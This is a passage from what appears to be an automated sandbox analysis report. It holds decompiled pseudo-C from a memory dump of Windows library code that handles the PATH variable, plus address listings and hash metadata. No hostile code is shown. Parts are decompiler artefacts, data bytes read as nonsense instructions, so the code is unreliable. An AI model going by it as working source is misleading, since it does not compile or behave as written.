											switch( *((intOrPtr*)(_t243 * 4 +  &M009E2959))) {
												case 0:
													__ax =  *0xaa8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E009FF3E0(__edi,  *0xaa848c, __ax & 0x0000ffff);
														__eax =  *0xaa8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E009FF3E0(_t323, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0xaa8480 & 0x0000ffff = E009FF3E0(__edi,  *0xaa8484,  *0xaa8480 & 0x0000ffff);
													__eax =  *0xaa8480 & 0x0000ffff;
													__eax = ( *0xaa8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E009FF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E009FF3E0(_t323, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t336 = _t336 + 0xc;
													_t323 = _t323 + (_t268 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t323 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0xaa575c;
													__eflags = __ebx - 0xaa575c;
													if(__ebx != 0xaa575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E009FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xaa575c;
														} while (__ebx != 0xaa575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xaa8478 & 0x0000ffff = E009FF3E0(__edi,  *0xaa847c,  *0xaa8478 & 0x0000ffff);
													__eax =  *0xaa8478 & 0x0000ffff;
													__eax = ( *0xaa8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00A439F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xaa6e58 & 0x0000ffff = E009FF3E0(__edi,  *0xaa6e5c,  *0xaa6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xaa6e58 & 0x0000ffff;
													__eax = ( *0xaa6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t293 = _v16;
													_t309 = _v32;
													L29:
													_t283 = _t283 + 4;
													__eflags = _t283;
													_v56 = _t283;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t293 = _t293 + 1;
									_v16 = _t293;
									__eflags = _t293 - _v48;
								} while (_t293 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t321 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M009E2935))) {
							case 0:
								__ax =  *0xaa8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E009E2E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xaa8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xaa8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E009CEEF0(0xaa79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E009CEB70(__ecx, 0xaa79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t289 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xaa7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L009D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E009CEB70(__ecx, 0xaa79a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t333;
										_pop(_t280);
										return E009FB640(_t218, _t280, _v8 ^ _t333, _t309, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t277 = E009E2E3E(_t275,  &_v36);
									_t289 = _v36;
									_v76 = _t277;
								}
								if(_t289 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t289;
								}
								goto L14;
							case 6:
								__eax =  *0xaa5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xaa8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xaa8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xaa6e58 & 0x0000ffff;
								__eax = ( *0xaa6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t294 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("sahf");
					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t243;
					asm("sahf");
					_t244 = _t243 + _t243;
					asm("daa");
					asm("sahf");
					 *_t328 =  *_t328 + _t294;
					asm("sahf");
					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t244;
					asm("sahf");
					 *0x1f009e26 =  *0x1f009e26 + _t244;
					_pop(_t284);
					 *0x9e289400 = _t244;
					 *0x200a25b =  *0x200a25b + _t309;
					 *((intOrPtr*)(_t328 - 0x61d78000)) =  *((intOrPtr*)(_t328 - 0x61d78000)) - _t284;
					asm("daa");
					asm("sahf");
					 *_t328 =  *_t328 + _t284;
					 *((intOrPtr*)(_t328 - 0x61d7b200)) =  *((intOrPtr*)(_t328 - 0x61d7b200)) - _t284;
					_a35 = _a35 + _t284;
					asm("sahf");
					_t245 = _t244 + _t284;
					_pop(_t285);
					 *0x9e28b400 = _t245;
					 *((intOrPtr*)(_t336 + _t285 * 2)) =  *((intOrPtr*)(_t336 + _t285 * 2)) + _t309 + _t309;
					 *0xcccccc00 = _t245;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xa8ff00);
					E00A0D08C(_t285, _t323, _t328);
					_v44 =  *[fs:0x18];
					_t324 = 0;
					 *_a24 = 0;
					_t286 = _a12;
					__eflags = _t286;
					if(_t286 == 0) {
						_t248 = 0xc0000100;
					} else {
						_v8 = 0;
						_t331 = 0xc0000100;
						_v52 = 0xc0000100;
						_t250 = 4;
						while(1) {
							_v40 = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								break;
							}
							_t299 = _t250 * 0xc;
							_v48 = _t299;
							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x991664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t265 = E009FE5C0(_a8,  *((intOrPtr*)(_t299 + 0x991668)), _t286);
									_t336 = _t336 + 0xc;
									__eflags = _t265;
									if(__eflags == 0) {
										_t331 = E00A351BE(_t286,  *((intOrPtr*)(_v48 + 0x99166c)), _a16, _t324, _t331, __eflags, _a20, _a24);
										_v52 = _t331;
										break;
									} else {
										_t250 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t250 = _t250 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t331;
						__eflags = _t331;
						if(_t331 < 0) {
							__eflags = _t331 - 0xc0000100;
							if(_t331 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t324;
									if( *_t295 == _t324) {
										_t331 = 0xc0000100;
										goto L76;
									} else {
										_t312 =  *((intOrPtr*)(_v44 + 0x30));
										_t252 =  *((intOrPtr*)(_t312 + 0x10));
										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t252 + 0x48)) == _t295) {
											__eflags =  *(_t312 + 0x1c);
											if( *(_t312 + 0x1c) == 0) {
												L106:
												_t331 = E009E2AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
												_v32 = _t331;
												__eflags = _t331 - 0xc0000100;
												if(_t331 != 0xc0000100) {
													goto L69;
												} else {
													_t324 = 1;
													_t295 = _v36;
													goto L75;
												}
											} else {
												_t255 = E009C6600( *(_t312 + 0x1c));
												__eflags = _t255;
												if(_t255 != 0) {
													goto L106;
												} else {
													_t295 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t331 = E009E2C50(_t295, _a8, _t286, _a16, _a20, _a24, _t324);
											L76:
											_v32 = _t331;
											goto L69;
										}
									}
									goto L108;
								} else {
									E009CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t331 = _a24;
									_t262 = E009E2AE4( &_v36, _a8, _t286, _a16, _a20, _t331);
									_v32 = _t262;
									__eflags = _t262 - 0xc0000100;
									if(_t262 == 0xc0000100) {
										_v32 = E009E2C50(_v36, _a8, _t286, _a16, _a20, _t331, 1);
									}
									_v8 = _t324;
									E009E2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t248 = _t331;
					}
					L70:
					return E00A0D0D1(_t248);
				}
				L108:
			}





















































                                                                                    0x009e2584
                                                                                    0x009e2586
                                                                                    0x009e2590
                                                                                    0x009e2596
                                                                                    0x009e2597
                                                                                    0x009e2598
                                                                                    0x009e2599
                                                                                    0x009e259e
                                                                                    0x009e25a4
                                                                                    0x009e25a9
                                                                                    0x009e25ac
                                                                                    0x009e25ae
                                                                                    0x009e25b1
                                                                                    0x009e25b2
                                                                                    0x009e25b5
                                                                                    0x009e25b8
                                                                                    0x009e25bb
                                                                                    0x009e25bc
                                                                                    0x009e25bf
                                                                                    0x009e25c2
                                                                                    0x009e25c5
                                                                                    0x009e25c6
                                                                                    0x009e25cb
                                                                                    0x009e25ce
                                                                                    0x009e25d8
                                                                                    0x009e25dd
                                                                                    0x009e25de
                                                                                    0x009e25e1
                                                                                    0x009e25e3
                                                                                    0x009e25e9
                                                                                    0x009e26da
                                                                                    0x009e26da
                                                                                    0x009e26dd
                                                                                    0x009e26e2
                                                                                    0x00a25b56
                                                                                    0x00000000
                                                                                    0x009e26e8
                                                                                    0x009e26f9
                                                                                    0x009e26fb
                                                                                    0x009e26fe
                                                                                    0x009e2700
                                                                                    0x00a25b60
                                                                                    0x00000000
                                                                                    0x009e2706
                                                                                    0x009e2706
                                                                                    0x009e270a
                                                                                    0x009e270a
                                                                                    0x009e270d
                                                                                    0x009e2713
                                                                                    0x009e2716
                                                                                    0x009e2718
                                                                                    0x009e271c
                                                                                    0x009e271e
                                                                                    0x00a25b6c
                                                                                    0x00a25b6f
                                                                                    0x00a25b7f
                                                                                    0x00a25b89
                                                                                    0x00a25b8e
                                                                                    0x00a25b93
                                                                                    0x00a25b96
                                                                                    0x00a25b9c
                                                                                    0x00a25ba0
                                                                                    0x00a25ba3
                                                                                    0x00a25bab
                                                                                    0x00a25bb0
                                                                                    0x00a25bb3
                                                                                    0x00a25bb3
                                                                                    0x00a25ba3
                                                                                    0x009e2724
                                                                                    0x009e2726
                                                                                    0x009e2729
                                                                                    0x009e272c
                                                                                    0x009e279d
                                                                                    0x009e279d
                                                                                    0x009e27a0
                                                                                    0x009e27a2
                                                                                    0x00000000
                                                                                    0x009e272e
                                                                                    0x009e272e
                                                                                    0x009e2731
                                                                                    0x009e2734
                                                                                    0x009e2734
                                                                                    0x009e2736
                                                                                    0x00a25bc1
                                                                                    0x00a25bc1
                                                                                    0x00a25bc4
                                                                                    0x00000000
                                                                                    0x00a25bca
                                                                                    0x00a25bca
                                                                                    0x00a25bcd
                                                                                    0x00000000
                                                                                    0x00a25bd3
                                                                                    0x00000000
                                                                                    0x00a25bd3
                                                                                    0x00a25bcd
                                                                                    0x009e273c
                                                                                    0x009e273c
                                                                                    0x009e2742
                                                                                    0x009e2747
                                                                                    0x009e274a
                                                                                    0x009e274d
                                                                                    0x009e2750
                                                                                    0x00000000
                                                                                    0x009e2756
                                                                                    0x009e2756
                                                                                    0x00000000
                                                                                    0x009e2902
                                                                                    0x009e2908
                                                                                    0x009e290b
                                                                                    0x00000000
                                                                                    0x009e2911
                                                                                    0x009e291c
                                                                                    0x009e2921
                                                                                    0x00000000
                                                                                    0x009e2921
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e2880
                                                                                    0x009e2887
                                                                                    0x009e288c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e2805
                                                                                    0x009e280a
                                                                                    0x009e2814
                                                                                    0x009e2816
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e281e
                                                                                    0x009e2821
                                                                                    0x009e2823
                                                                                    0x00000000
                                                                                    0x009e2829
                                                                                    0x009e2829
                                                                                    0x009e2831
                                                                                    0x009e283c
                                                                                    0x009e283e
                                                                                    0x00000000
                                                                                    0x009e283e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e284e
                                                                                    0x009e2850
                                                                                    0x009e2851
                                                                                    0x009e2854
                                                                                    0x009e2857
                                                                                    0x009e285a
                                                                                    0x009e285c
                                                                                    0x009e285d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e275d
                                                                                    0x009e2761
                                                                                    0x00000000
                                                                                    0x009e2767
                                                                                    0x009e276e
                                                                                    0x009e2773
                                                                                    0x009e2773
                                                                                    0x009e2776
                                                                                    0x009e2778
                                                                                    0x009e277e
                                                                                    0x009e277e
                                                                                    0x009e2781
                                                                                    0x009e2781
                                                                                    0x009e2783
                                                                                    0x009e2784
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a25bd8
                                                                                    0x00a25bde
                                                                                    0x00a25be4
                                                                                    0x00a25be6
                                                                                    0x00a25be8
                                                                                    0x00a25be9
                                                                                    0x00a25bee
                                                                                    0x00a25bf8
                                                                                    0x00a25bff
                                                                                    0x00a25c01
                                                                                    0x00a25c04
                                                                                    0x00a25c07
                                                                                    0x00a25c0b
                                                                                    0x00a25c0d
                                                                                    0x00a25c0d
                                                                                    0x00a25c15
                                                                                    0x00a25c18
                                                                                    0x00a25c1b
                                                                                    0x00a25c1b
                                                                                    0x00a25c1e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e28c3
                                                                                    0x009e28c8
                                                                                    0x009e28d2
                                                                                    0x009e28d4
                                                                                    0x009e28d8
                                                                                    0x009e28db
                                                                                    0x00a25c26
                                                                                    0x00a25c28
                                                                                    0x00a25c2d
                                                                                    0x00a25c2d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a25c34
                                                                                    0x00a25c36
                                                                                    0x00a25c49
                                                                                    0x00a25c4e
                                                                                    0x00a25c54
                                                                                    0x00a25c5b
                                                                                    0x00a25c5d
                                                                                    0x00a25c60
                                                                                    0x009e2788
                                                                                    0x009e2788
                                                                                    0x009e278b
                                                                                    0x009e278e
                                                                                    0x009e278e
                                                                                    0x009e278e
                                                                                    0x009e2791
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e2756
                                                                                    0x009e2750
                                                                                    0x00000000
                                                                                    0x009e2794
                                                                                    0x009e2794
                                                                                    0x009e2795
                                                                                    0x009e2798
                                                                                    0x009e2798
                                                                                    0x00000000
                                                                                    0x009e2734
                                                                                    0x009e272c
                                                                                    0x009e2700
                                                                                    0x009e25ef
                                                                                    0x009e25ef
                                                                                    0x009e25ef
                                                                                    0x009e25f2
                                                                                    0x009e25f8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e25fe
                                                                                    0x00000000
                                                                                    0x009e28e6
                                                                                    0x009e28ec
                                                                                    0x009e28ef
                                                                                    0x009e28f5
                                                                                    0x009e28f8
                                                                                    0x009e28f8
                                                                                    0x00000000
                                                                                    0x009e28f8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e2866
                                                                                    0x009e2866
                                                                                    0x009e2876
                                                                                    0x009e2879
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e27e0
                                                                                    0x009e27e7
                                                                                    0x009e27e9
                                                                                    0x009e27eb
                                                                                    0x00a25afd
                                                                                    0x00000000
                                                                                    0x00a25afd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e2633
                                                                                    0x009e2638
                                                                                    0x009e263b
                                                                                    0x009e263c
                                                                                    0x009e263e
                                                                                    0x009e2640
                                                                                    0x009e2642
                                                                                    0x009e2647
                                                                                    0x009e2649
                                                                                    0x009e264e
                                                                                    0x009e2650
                                                                                    0x009e2653
                                                                                    0x009e2659
                                                                                    0x009e26a2
                                                                                    0x009e26a7
                                                                                    0x009e26ac
                                                                                    0x009e26b2
                                                                                    0x00a25b11
                                                                                    0x00a25b15
                                                                                    0x00a25b17
                                                                                    0x00000000
                                                                                    0x009e26b8
                                                                                    0x009e26b8
                                                                                    0x009e26ba
                                                                                    0x009e27a6
                                                                                    0x009e27a6
                                                                                    0x009e27a9
                                                                                    0x009e27ab
                                                                                    0x009e27b9
                                                                                    0x009e27b9
                                                                                    0x009e27be
                                                                                    0x009e27c1
                                                                                    0x009e27c3
                                                                                    0x009e27c5
                                                                                    0x009e27c7
                                                                                    0x00a25c74
                                                                                    0x00a25c79
                                                                                    0x00a25c79
                                                                                    0x009e27c7
                                                                                    0x00000000
                                                                                    0x009e26c0
                                                                                    0x009e26c0
                                                                                    0x009e26c3
                                                                                    0x009e26c6
                                                                                    0x009e26c6
                                                                                    0x009e26c9
                                                                                    0x009e26c9
                                                                                    0x00000000
                                                                                    0x009e26c9
                                                                                    0x009e26ba
                                                                                    0x009e265b
                                                                                    0x009e265b
                                                                                    0x009e265e
                                                                                    0x009e2667
                                                                                    0x009e266d
                                                                                    0x009e2677
                                                                                    0x009e267c
                                                                                    0x009e267f
                                                                                    0x009e2681
                                                                                    0x00a25b49
                                                                                    0x00a25b4e
                                                                                    0x009e27cd
                                                                                    0x009e27d0
                                                                                    0x009e27d1
                                                                                    0x009e27d2
                                                                                    0x009e27d4
                                                                                    0x009e27dd
                                                                                    0x009e2687
                                                                                    0x009e2687
                                                                                    0x009e268a
                                                                                    0x009e268b
                                                                                    0x009e268e
                                                                                    0x009e268f
                                                                                    0x009e2691
                                                                                    0x009e2696
                                                                                    0x009e2698
                                                                                    0x009e269d
                                                                                    0x009e269f
                                                                                    0x00000000
                                                                                    0x009e269f
                                                                                    0x009e2681
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e2846
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e2605
                                                                                    0x009e260a
                                                                                    0x009e260c
                                                                                    0x009e2611
                                                                                    0x009e2616
                                                                                    0x009e2619
                                                                                    0x009e2619
                                                                                    0x009e261e
                                                                                    0x00000000
                                                                                    0x009e2624
                                                                                    0x009e2627
                                                                                    0x009e2627
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a25b1f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e2894
                                                                                    0x009e289b
                                                                                    0x009e289d
                                                                                    0x009e28a1
                                                                                    0x00a25b2b
                                                                                    0x00a25b2e
                                                                                    0x00a25b2e
                                                                                    0x009e28a7
                                                                                    0x009e28a9
                                                                                    0x00a25b04
                                                                                    0x00a25b09
                                                                                    0x00a25b09
                                                                                    0x00a25b09
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a25b35
                                                                                    0x00a25b3c
                                                                                    0x009e28fb
                                                                                    0x009e28fb
                                                                                    0x009e26cc
                                                                                    0x009e26cc
                                                                                    0x009e26d0
                                                                                    0x00000000
                                                                                    0x009e26d2
                                                                                    0x009e26d2
                                                                                    0x00000000
                                                                                    0x009e26d2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e25fe
                                                                                    0x009e292d
                                                                                    0x009e292f
                                                                                    0x009e2930
                                                                                    0x009e2935
                                                                                    0x009e2937
                                                                                    0x009e2938
                                                                                    0x009e293b
                                                                                    0x009e293c
                                                                                    0x009e293e
                                                                                    0x009e293f
                                                                                    0x009e2940
                                                                                    0x009e2942
                                                                                    0x009e2944
                                                                                    0x009e2947
                                                                                    0x009e2948
                                                                                    0x009e294e
                                                                                    0x009e294f
                                                                                    0x009e2954
                                                                                    0x009e295a
                                                                                    0x009e2962
                                                                                    0x009e2963
                                                                                    0x009e2964
                                                                                    0x009e2966
                                                                                    0x009e296c
                                                                                    0x009e296f
                                                                                    0x009e2970
                                                                                    0x009e2972
                                                                                    0x009e2973
                                                                                    0x009e2978
                                                                                    0x009e297b
                                                                                    0x009e2980
                                                                                    0x009e2981
                                                                                    0x009e2982
                                                                                    0x009e2983
                                                                                    0x009e2984
                                                                                    0x009e2985
                                                                                    0x009e2986
                                                                                    0x009e2987
                                                                                    0x009e2988
                                                                                    0x009e2989
                                                                                    0x009e298a
                                                                                    0x009e298b
                                                                                    0x009e298c
                                                                                    0x009e298d
                                                                                    0x009e298e
                                                                                    0x009e298f
                                                                                    0x009e2990
                                                                                    0x009e2992
                                                                                    0x009e2997
                                                                                    0x009e29a3
                                                                                    0x009e29a6
                                                                                    0x009e29ab
                                                                                    0x009e29ad
                                                                                    0x009e29b0
                                                                                    0x009e29b2
                                                                                    0x00a25c80
                                                                                    0x009e29b8
                                                                                    0x009e29b8
                                                                                    0x009e29bb
                                                                                    0x009e29c0
                                                                                    0x009e29c5
                                                                                    0x009e29c6
                                                                                    0x009e29c6
                                                                                    0x009e29c9
                                                                                    0x009e29cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009e29cd
                                                                                    0x009e29d0
                                                                                    0x009e29d9
                                                                                    0x009e29db
                                                                                    0x009e29dd
                                                                                    0x009e2a7f
                                                                                    0x009e2a84
                                                                                    0x009e2a87
                                                                                    0x009e2a89
                                                                                    0x00a25ca1
                                                                                    0x00a25ca3
                                                                                    0x00000000
                                                                                    0x009e2a8f
                                                                                    0x009e2a8f
                                                                                    0x00000000
                                                                                    0x009e2a8f
                                                                                    0x00000000
                                                                                    0x009e29e3
                                                                                    0x009e29e3
                                                                                    0x009e29e3
                                                                                    0x00000000
                                                                                    0x009e29e3
                                                                                    0x009e29dd
                                                                                    0x00000000
                                                                                    0x009e29db
                                                                                    0x009e29e6
                                                                                    0x009e29e9
                                                                                    0x009e29eb
                                                                                    0x009e29ed
                                                                                    0x009e29f3
                                                                                    0x009e29f5
                                                                                    0x009e29f8
                                                                                    0x009e29fa
                                                                                    0x009e2a97
                                                                                    0x009e2a9a
                                                                                    0x009e2a9d
                                                                                    0x009e2add
                                                                                    0x00000000
                                                                                    0x009e2a9f
                                                                                    0x009e2aa2
                                                                                    0x009e2aa5
                                                                                    0x009e2aa8
                                                                                    0x009e2aab
                                                                                    0x00a25cab
                                                                                    0x00a25caf
                                                                                    0x00a25cc5
                                                                                    0x00a25cda
                                                                                    0x00a25cdc
                                                                                    0x00a25cdf
                                                                                    0x00a25ce5
                                                                                    0x00000000
                                                                                    0x00a25ceb
                                                                                    0x00a25ced
                                                                                    0x00a25cee
                                                                                    0x00000000
                                                                                    0x00a25cee
                                                                                    0x00a25cb1
                                                                                    0x00a25cb4
                                                                                    0x00a25cb9
                                                                                    0x00a25cbb
                                                                                    0x00000000
                                                                                    0x00a25cbd
                                                                                    0x00a25cbd
                                                                                    0x00000000
                                                                                    0x00a25cbd
                                                                                    0x00a25cbb
                                                                                    0x009e2ab1
                                                                                    0x009e2ab1
                                                                                    0x009e2ac4
                                                                                    0x009e2ac6
                                                                                    0x009e2ac6
                                                                                    0x00000000
                                                                                    0x009e2ac6
                                                                                    0x009e2aab
                                                                                    0x00000000
                                                                                    0x009e2a00
                                                                                    0x009e2a09
                                                                                    0x009e2a0e
                                                                                    0x009e2a21
                                                                                    0x009e2a24
                                                                                    0x009e2a35
                                                                                    0x009e2a3a
                                                                                    0x009e2a3d
                                                                                    0x009e2a42
                                                                                    0x009e2a59
                                                                                    0x009e2a59
                                                                                    0x009e2a5c
                                                                                    0x009e2a5f
                                                                                    0x009e2a5f
                                                                                    0x009e29fa
                                                                                    0x009e29f3
                                                                                    0x009e2a64
                                                                                    0x009e2a64
                                                                                    0x009e2a6b
                                                                                    0x009e2a6b
                                                                                    0x009e2a6d
                                                                                    0x009e2a72
                                                                                    0x009e2a72
                                                                                    0x00000000

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: PATH
                                                                                    • API String ID: 0-1036084923
                                                                                    • Opcode ID: 0ff5003f80b272b3dd3dbaf9a02112bddcf6978e4b7cbb9a53d33b09ce75837e
                                                                                    • Instruction ID: fd2c2d5d475ff935107eb7edf9e0351b784ec332a3f9ef69e2d759bc4a983161
                                                                                    • Opcode Fuzzy Hash: 0ff5003f80b272b3dd3dbaf9a02112bddcf6978e4b7cbb9a53d33b09ce75837e
                                                                                    • Instruction Fuzzy Hash: B2C191B1D00259DBCB16DFA9D881BBEB7B9FF48740F144429E401AB291D775AD41CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009EFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 80%
                                                                                    			E009EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E009CEEF0(0xaa7b60);
					_t134 =  *0xaa7b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xaa7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
